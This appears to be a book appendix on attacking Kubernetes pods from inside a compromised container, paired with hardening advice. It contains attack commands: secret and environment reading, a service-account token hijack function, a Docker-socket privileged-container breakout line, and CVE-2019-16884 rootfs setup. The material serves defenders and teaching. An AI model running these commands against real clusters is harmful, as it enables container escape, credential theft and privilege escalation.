This appendix is a hands-on exploration of attacks at the pod level, as discussed in Chapter 2.
Dread cyberpirate Captain Hashjack can now execute code remotely inside a pod, and will start to explore its configuration to see what else can be accessed.
Like all good pirates, Captain Hashjack has a treasure map, but this is no ordinary map with a clearly defined destination. Instead, this map describes only the journey, with no guarantee of reaching a conclusion. It’s a cluster attack map, as shown in Figure A-1, and it is used to guide us through the rest of the appendix. And now, from inside the pod, it’s time to explore.
Securing any system is difficult. The best way to find vulnerabilities and misconfiguration is to methodically observe your environment, build up a library of your own attacks and patterns, and not give up!
Upon entering a new environment, a little basic checking may lead to useful discoveries.
The first thing Hashjack does is check what kind of container they're in. Checking /proc/self/cgroup often gives a clue, and here they can see they're in Kubernetes from the clue /kubepods/besteffort/pod8a6fa26b-...:

adversary@hashjack-5ddf66bb7b-9sssx:/$ cat /proc/self/cgroup
11:memory:/kubepods/besteffort/pod8a6fa26b-.../f3d7b09d9c3a1ab10cf88b3956...
10:cpu,cpuacct:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b...
9:blkio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b3956704...
8:net_cls,net_prio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10c...
7:perf_event:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39...
6:freezer:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
5:pids:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567048...
4:cpuset:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b395670...
3:hugetlb:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
2:devices:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
1:name=systemd:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b...
Next, they might check for capabilities via their process's status entry in /proc/self/status:

Name:   cat
State:  R (running)
Tgid:   278
Ngid:   0
Pid:    278
PPid:   259
TracerPid:      0
Uid:    1001    1001    1001    1001
Gid:    0       0       0       0
FDSize: 256
Groups:
NStgid: 278
NSpid:  278
NSpgid: 278
NSsid:  259
VmPeak:     2432 kB
VmSize:     2432 kB
VmLck:         0 kB
VmPin:         0 kB
VmHWM:       752 kB
VmRSS:       752 kB
VmData:      312 kB
VmStk:       132 kB
VmExe:        28 kB
VmLib:      1424 kB
VmPTE:        24 kB
VmPMD:        12 kB
VmSwap:        0 kB
HugetlbPages:  0 kB
Threads:        1
SigQ:   0/15738
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 00000000a80425fb
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Seccomp:        0
Speculation_Store_Bypass:       vulnerable
Cpus_allowed:   0003
Cpus_allowed_list:      0-1
Mems_allowed:   00000000,00000001
Mems_allowed_list:      0
voluntary_ctxt_switches:        0
nonvoluntary_ctxt_switches:     1
The kernel freely provides this information in order to help Linux applications, and an attacker in a container can use it to their advantage. Interesting entries can be grepped out (notice we’re root below):
root@hack:~[0]$ grep -E \
    '(Uid|CoreDumping|Seccomp|NoNewPrivs|Cap[A-Za-z]+):' /proc/self/status
Uid:    0       0       0       0
CoreDumping:    0
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs:     0
Seccomp:        0
The capabilities are not very readable, and need to be decoded:
root@hack:~[0]$ capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,
cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,
cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,
cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,
cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,
cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,
cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,
cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
You can also use the capsh --print command to show capabilities (if it's installed), getpcaps and filecap (for a single process or file, respectively), pscap (for all running processes), and captest (for the current process's context):
root@hack:~[0]$ capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,
  cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,
  cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,
  cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,
  cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root)
gid=0(root)
groups=1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)...
A production container should never contain these debugging commands; it should contain only production applications and code. Using static, slim, or distroless containers reduces the attack surface of a container by limiting an attacker's access to useful information. This is also why you should limit the availability of network-capable applications like curl and wget where possible, as well as any interpreters with network libraries that could be used to pull external tools into a running container.
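A quick check from the compromised shell shows which of these tools survive in a given image (a minimal sketch; the binary list and the all-missing output are illustrative of a well-stripped image):

adversary@hashjack-5ddf66bb7b-9sssx:/$ # which network-capable tools are present? (list is illustrative)
adversary@hashjack-5ddf66bb7b-9sssx:/$ for b in curl wget nc python3 perl; do
>   command -v "$b" || echo "$b: not found"
> done
curl: not found
wget: not found
nc: not found
python3: not found
perl: not found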
You may prefer to run Jess Frazelle’s amicontained, which runs these checks quickly and also handily detects capability, seccomp, and LSM configuration.
This command requires internet access, which is another privilege that production workloads should not be afforded unless required for production operation. Air-gapped (fully offline) clusters afford greater security from this type of attack at the cost of administrative overhead.
Let's use amicontained:
root@hack:~[0]$ export AMICONTAINED_SHA256="d8c49e2cf44ee9668219acd092e\
d961fc1aa420a6e036e0822d7a31033776c9f"
root@hack:~[0]$ curl -fSL \
    "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/\
amicontained-linux-amd64" \
    -o "/tmp/amicontained" \
    && echo "${AMICONTAINED_SHA256}  /tmp/amicontained" | sha256sum -c - \
    && chmod a+x "/tmp/amicontained"
root@hack:~[0]$ /tmp/amicontained
Container Runtime: kube
Has Namespaces:
        pid: true
        user: false
AppArmor Profile: docker-default (enforce)
Capabilities:
        BOUNDING -> chown dac_override fowner fsetid kill setgid setuid
        setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked system calls (26):
        SYSLOG SETUID SETSID SETREUID SETGROUPS SETRESUID VHANGUP PIVOT_ROOT
        ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME
        SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE KEXEC_LOAD
        FUTIMESAT UTIMENSAT FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE
        KEXEC_FILE_LOAD
Looking for Docker.sock
Export the sha256sum for verification.
Download and check the sha256sum.
We installed to a non-standard path to evade immutable filesystems, so we run it via a fully qualified path.
Jackpot! There’s a lot of information available about the security configuration of a container—from within it.
We can check our cgroup limits on the filesystem too:

root@hack:~[0]$ free -m
              total        used        free      shared  buff/cache   available
Mem:           3950         334        1473           6        2142        3327
Swap:             0           0           0
free -m uses host-level APIs available to all processes and has not been updated to run with cgroups. Check the system API to see the process's actual cgroup limits:

root@host:~[0]$ docker run -it --memory=4MB sublimino/hack \
    cat /sys/fs/cgroup/memory/memory.limit_in_bytes
4194304
Is this tremendously useful to an attacker? Not really. Exhausting the memory of a process and causing denial of service is a basic attack (although fork bombs are elegantly scripted Bash poetry). Nevertheless, you should set cgroup limits to prevent DoS of applications in a container or pod (both support individual configuration). Cgroups are not a security boundary, and cgroups v1 can be escaped from a privileged pod, as nicely demonstrated in Figure A-2.
Figure A-2. cgroups v1 container breakout

The more secure cgroups v2, a prerequisite for rootless containers, should be the default in most Linux installations from 2022.
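To set those cgroup limits declaratively, resource requests and limits can be added per container in the pod spec. This is a minimal sketch; the pod name, image, and values are illustrative:

apiVersion: v1
kind: Pod
metadata:
  name: limited-pod            # illustrative name
spec:
  containers:
  - name: app
    image: nginx               # illustrative image
    resources:
      requests:
        memory: "64Mi"
        cpu: "250m"
      limits:
        memory: "128Mi"        # enforced via the memory cgroup; exceeding it OOM-kills the container
        cpu: "500m"            # enforced via CPU cgroup throttling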
Denial of service is more likely to be an application fault than an attack. Serious DDoS (internet-based distributed denial of service) should be handled by networking equipment in front of the cluster, which has the bandwidth to absorb and mitigate it.
In September 2017 Google fought off a 2.54 Tbps DDoS. This type of traffic is dropped by network router hardware at ingress to prevent it from overwhelming internal systems.
Kubernetes sets some useful environment variables into each container in a pod:
root@frontend:/frontend[0]$ env | grep -E '(KUBERNETES|[^_]SERVICE)_PORT=' | sort
ADSERVICE_PORT=tcp://10.3.253.186:9555
CARTSERVICE_PORT=tcp://10.3.251.123:7070
CHECKOUTSERVICE_PORT=tcp://10.3.240.26:5050
CURRENCYSERVICE_PORT=tcp://10.3.240.14:7000
EMAILSERVICE_PORT=tcp://10.3.242.14:5000
KUBERNETES_PORT=tcp://10.3.240.1:443
PAYMENTSERVICE_PORT=tcp://10.3.248.231:50051
PRODUCTCATALOGSERVICE_PORT=tcp://10.3.250.74:3550
RECOMMENDATIONSERVICE_PORT=tcp://10.3.254.65:8080
SHIPPINGSERVICE_PORT=tcp://10.3.242.42:50051
It is easy for an application to read its configuration from environment variables, and the Twelve-Factor App methodology suggests that config and Secrets should be set in the environment. Environment variables are not a safe place to store Secrets, however, as they can easily be read from the PID namespace by a process, user, or malicious code.
You can see a process's environment as root, or as the same user. Check PID 1 with a null-byte translation:

root@frontend:/frontend[0]$ tr '\0' '\n' < /proc/1/environ
HOSTNAME=9c7e824ed321
PWD=/
# ...
Even if no compromise takes place, many applications dump their environment when they crash, leaking Secrets to anyone who can access the logging system.
Kubernetes Secrets should not be mounted as environment variables.
As well as being easy to collect from a parent process if an attacker has remote code execution, Kubernetes container environment variables are not updated after container creation: if the Secret is updated by the API server, the environment variable keeps the same value.
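For contrast, this is the environment-variable Secret pattern those caveats apply to (a hypothetical snippet; the variable, Secret, and key names are illustrative):

# Anti-pattern: the Secret value lands in the process environment, where it is
# readable via /proc/<pid>/environ and is not refreshed if the Secret changes
env:
- name: DB_PASSWORD
  valueFrom:
    secretKeyRef:
      name: mysecret
      key: password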
The safer option is to use a well-known path and mount a Secret tmpfs volume into the container, so an adversary has to guess or find the Secret file path, which is less likely to be automated by an attacker. Mounted Secrets are updated automatically, after a kubelet sync period and cache propagation delay.
Here’s an example of a Secret mounted into the path /etc/foo:
apiVersion: v1
kind: Pod
metadata:
  name: mypod
spec:
  containers:
  - name: mypod
    image: redis
    volumeMounts:
    - name: foo
      mountPath: "/etc/foo"
      readOnly: true
  volumes:
  - name: foo
    secret:
      secretName: mysecret
Mounting Secrets as files protects against information leakage and ensures adversaries like Captain Hashjack don’t stumble across production secrets when diving through stolen application logs.
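From inside the pod, the mounted Secret appears as ordinary files under the well-known path (a sketch, assuming mysecret holds a single key named password; the value shown is made up):

root@mypod:/# ls /etc/foo
password
root@mypod:/# cat /etc/foo/password   # value below is illustrative
s3cr3t!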
A fastidious explorer leaves no sea uncharted, and to Captain Hashjack attacking the filesystem is no different. Checking for anything external added to the mount namespace is the first port of call, for which common tools like mount and df can be used.
Every external device, filesystem, socket, or entity shared into a container increases the risk of container breakout through exploit or misconfiguration. Containers are at their most secure when they contain only the bare essentials for operation, and share nothing with each other or the underlying host.
Let's start with a search of the filesystem mount points for a common container filesystem driver, overlayfs. This may leak information about the type of container runtime that has configured the filesystem:

root@test-db-client-pod:~[0]$ mount | grep overlay
overlay on / type overlay (rw,relatime,lowerdir=
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/315/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/314/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/313/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/312/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/311/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/310/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/309/fs:
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/308/fs,upperdir=
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/fs,workdir=
/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/work)
We can see that the underlying container runtime is using a file path containing the name containerd, and the location of the container's filesystem on the host disk is /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs. There are multiple layered directories listed, and these are combined into a single filesystem at runtime by overlayfs.
These paths are fingerprints of the container runtime's default configuration, and runc leaks its identity in the same way, with a different filesystem layout:

root@dbe6633a6c94:/# mount | grep overlay
overlay on / type overlay (rw,relatime,lowerdir=
/var/lib/docker/overlay2/l/3PTJCBKLNC2V5MRAEF3AU6EDMS:
/var/lib/docker/overlay2/l/SAJGPHO7UFXGYFRMGNJPUOXSQ5:
/var/lib/docker/overlay2/l/4CZQ74RFDNSDSHQB6CTY6CLW7H,upperdir=
/var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/diff,workdir=
/var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/work)
Run the df command to see if there are any Secrets mounted into the container. In this example no external entities are mounted into the container:

root@test-db-client-pod:~[0]$ df
Filesystem  Type     Size  Used Avail Use% Mounted on
overlay     overlay   95G  6.6G   88G   7% /
tmpfs       tmpfs     64M     0   64M   0% /dev
tmpfs       tmpfs    7.1G     0  7.1G   0% /sys/fs/cgroup
/dev/sda1   ext4      95G  6.6G   88G   7% /etc/hosts
shm         tmpfs     64M     0   64M   0% /dev/shm
tmpfs       tmpfs    7.1G     0  7.1G   0% /proc/acpi
tmpfs       tmpfs    7.1G     0  7.1G   0% /proc/scsi
tmpfs       tmpfs    7.1G     0  7.1G   0% /sys/firmware
We can see that tmpfs is used for many different mounts, and some mounts are masking host filesystems in /proc and /sys. The container runtime performs additional masking on the special files in those directories.
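You can see that masking at work: the overmounted directories appear empty from inside the container, matching the tmpfs entries in the df listing above:

root@test-db-client-pod:~[0]$ ls /proc/acpi /proc/scsi
/proc/acpi:

/proc/scsi: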
Potentially interesting mounts in a vulnerable container filesystem may include host-mounted Secrets and sockets, especially the infamous Docker socket, and Kubernetes service accounts that may have RBAC authorization to escalate privilege or enable further attacks:
root@test-db-client-pod:~[0]$ df
Filesystem  Type  ... Use% Mounted on
tmpfs       tmpfs ...   1% /etc/secret-volume
tmpfs       tmpfs ...   1% /run/docker.sock
tmpfs       tmpfs ...   1% /run/secrets/kubernetes.io/serviceaccount
The easiest and most convenient container breakout of all is the /var/run/docker.sock mount: the container runtime's socket shared from the host, which gives access to the Docker daemon running on the host. That daemon can be used to start new containers, and if those containers are privileged they can be used to trivially "escape" the container namespace and access the underlying host as root, as we saw previously in this appendix.
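A minimal sketch of that breakout, assuming a docker client binary is available (or can be dropped) inside the compromised pod; the alpine image and flags illustrate the classic technique rather than a specific exploit:

root@test-db-client-pod:~[0]$ # assumes a docker client binary is present in the pod
root@test-db-client-pod:~[0]$ docker -H unix:///run/docker.sock run --rm -it \
    --privileged --pid=host -v /:/host alpine chroot /host /bin/sh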
Other appealing targets include the Kubernetes service account tokens under /var/run/secrets/kubernetes.io/serviceaccount, or writable host mounted directories like /etc/secret-volume. Any of these could lead to a breakout, or assist a pivot.
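The service account mount follows a well-known layout on a typical cluster, so it is trivial to enumerate: a CA bundle, the pod's namespace, and a bearer token.

root@test-db-client-pod:~[0]$ ls /run/secrets/kubernetes.io/serviceaccount
ca.crt  namespace  token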
Everything a kubelet mounts into its containers is visible to the root user on the kubelet's host. We'll see what the serviceAccount mounted at /run/secrets/kubernetes.io/serviceaccount looks like later, and we investigated what to do with stolen serviceAccount credentials in Chapter 8.
From within a pod, kubectl uses the credentials in /run/secrets/kubernetes.io/serviceaccount by default. From the kubelet host these files are mounted under /var/lib/kubelet/pods/123e4567-e89b-12d3-a456-426614174000/volumes/kubernetes.io~secret/my-pod-token-7vzn2, so load the following command into a Bash shell:
kubectl-sa-dir() {
  local DIR="${1:-}";
  local API_SERVER="${2:-kubernetes.default}";
  kubectl config set-cluster tmpk8s --server="https://${API_SERVER}" \
    --certificate-authority="${DIR}/ca.crt";
  kubectl config set-context tmpk8s --cluster=tmpk8s;
  kubectl config set-credentials tmpk8s --token="$(<${DIR}/token)";
  kubectl config set-context tmpk8s --user=tmpk8s;
  kubectl config use-context tmpk8s;
  kubectl get secrets -n null 2>&1 | sed -E 's,.*r "([^"]+).*,\1,g'
}
And run it against a directory:

root@kube-node-1:~ [0]# kubectl-sa-dir \
    /var/lib/kubelet/pods/.../kubernetes.io~secret/priv-app-r4zkx/...229622223/
Cluster "tmpk8s" set.
Context "tmpk8s" created.
User "tmpk8s" set.
Context "tmpk8s" modified.
Switched to context "tmpk8s".
apiVersion: v1
clusters:
- cluster:
    certificate-authority: \
      /var/lib/kubelet/pods/.../kubernetes.io~secret/.../...229622223/ca.crt
    server: https://10.0.1.1:6443
  name: tmpk8s
# ...
system:serviceaccount:kube-system:priv-app
You're now able to use the system:serviceaccount:kube-system:priv-app service account (SA) more easily with kubectl, as it's configured in your ~/.kube/config. An attacker can do the same thing: hostile root access to a Kubernetes node reveals all of its Secrets!
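A natural next step with the hijacked context (and a useful defensive audit) is to enumerate what the SA is actually authorized to do; the output depends entirely on the cluster's RBAC policy:

root@kube-node-1:~ [0]# kubectl --context tmpk8s auth can-i --list   # output depends on cluster RBAC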
CSI storage interfaces and host filesystem mounts both pose a security risk if others have access to them. We explore external storage, the Container Storage Interface (CSI), and other mounts in greater detail in Chapter 6.
What else is there mounted that might catch an adversary’s treasure-hungry gaze? Let’s explore further.
The Kubernetes hostPath volume type mounts a filesystem path from the host into the container, which may be useful for some applications. /var/log is a popular mount point, so the host's journal process can collect container syslog events. hostPath volumes should be avoided where possible as they present many risks. Best practice is to scope the mount to only the needed file or directory, and to use the readOnly mount flag.
Other use cases for hostPath mounts include persistence for datastores in the pod, or hosting static data, libraries, and caches.
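A minimal sketch of a scoped, read-only hostPath mount following that guidance (the pod name, image, and command are illustrative):

apiVersion: v1
kind: Pod
metadata:
  name: log-reader              # illustrative name
spec:
  containers:
  - name: log-reader
    image: busybox              # illustrative image
    command: ["sleep", "3600"]
    volumeMounts:
    - name: varlog
      mountPath: /var/log
      readOnly: true            # container cannot write to the host path
  volumes:
  - name: varlog
    hostPath:
      path: /var/log            # scoped to the single directory needed
      type: Directory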
Using host disks or permanently attaching storage to a node creates a coupling between workloads and the underlying node, as the workloads must be restarted on that node in order to function properly. This makes scaling and resilience much more difficult.
Host mounts can be dangerous if a symlink is created inside the container that is unintentionally resolved on the host filesystem. This happened in CVE-2017-1002101, where a bug in the symbolic link handling code allowed an adversary inside a container to explore the host filesystem that the mount point was on.
Mounting sockets from the host into the container is also a popular hostPath use case, which allows a client inside the container to run commands against a server on the host. This is an easy path to container breakout, by starting a new privileged container on the host and escaping into it. Mounting sensitive directories or files from the host may also provide an opportunity to pivot if they can be used for network services.
hostPath volumes are writeable on the host partition outside the container, and are always mounted on the host filesystem as owned by root:root. For this reason, a nonroot user should always be used inside the container, and filesystem permissions should always be configured on the host if write access is needed inside the container. If you are restricting hostPath access to specific directories with admission controllers, those volumeMounts must be readOnly, otherwise new symlinks can be used to traverse the host filesystem.
Ultimately data is the lifeblood of your business, and managing state is hard. An attacker will be looking to gather, exfiltrate, and cryptolock any data they can find in your systems. Consuming an external service (such as an object store or database hosted outside your cluster) to persist data is often the most resilient and scalable way to secure a system—however, for high-bandwidth or low-latency applications this may be impossible.
For everything else, cloud provider or internal service integrations remove the link between a workload and the underlying host, which makes scaling, upgrades, and system deployments much easier.
Managed services and dedicated infrastructure clusters are an easier cluster security abstraction to reason about, and we talk more about them in Chapter 7.
A hostile container is one that is under an attacker's control. It may be created by an attacker with Kubernetes access (perhaps to the kubelet or the API server), be a container image with automated exploit code embedded (for example, a "trojanized" image from dockerscan that can start a reverse shell in a legitimate container to give attackers access to your production systems), or have been accessed by a remote adversary post-deployment.
What about the filesystem of a hostile container image? If Captain Hashjack can force Kubernetes to run a container they have built or corrupted, they may try to attack the orchestrator, the container runtime, or clients (such as kubectl).
One attack (CVE-2019-16884) involves a container image that defines a VOLUME over a directory AppArmor uses for configuration, essentially disabling it at container runtime:

mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}
This may be used as part of a further attack on the system, but as AppArmor is unlikely to be the only layer of defense, it is not as serious as it may appear.
Another dangerous container image is one used by the /proc/self/exe breakout in CVE-2019-5736. This exploit requires a container with a maliciously linked ENTRYPOINT, so it can't be run in a container that has already started.
As these attacks show, unless a container is built from trusted components, it should be considered untrusted, to defend against further unknown attacks such as these.
A collection of kubectl cp CVEs (CVE-2018-1002100, CVE-2019-11249) require a malicious tar binary inside the container. The vulnerability stems from kubectl trusting the input it receives from the scp and tar processes inside the container, which can be manipulated to overwrite files on the machine the kubectl binary is being run on.
The danger of the /proc/self/exe breakout in CVE-2019-5736 is that a hostile container process can overwrite the runc binary on the host. That runc binary is owned by root, but as it is also executed by root on the host (as most container runtimes need some root capabilities), it can be overwritten from inside the container in this attack. This is because the container process is a child of runc, and the exploit uses the permission runc has to overwrite itself.
Protecting the host from privileged container processes is best achieved by removing root privileges from the container runtime. Both runc and Podman can run in rootless mode, which we explore in Chapter 3.
The root user has many special privileges as a result of years of kernel development that assumed only one "root" user. To limit the impact of RCE on the container, pod, and host, applications inside a container should not run as root, their capabilities should be dropped, and they should be prevented from gaining privileges by setting the allowPrivilegeEscalation securityContext field to false (which sets the no_new_privs flag on the container process).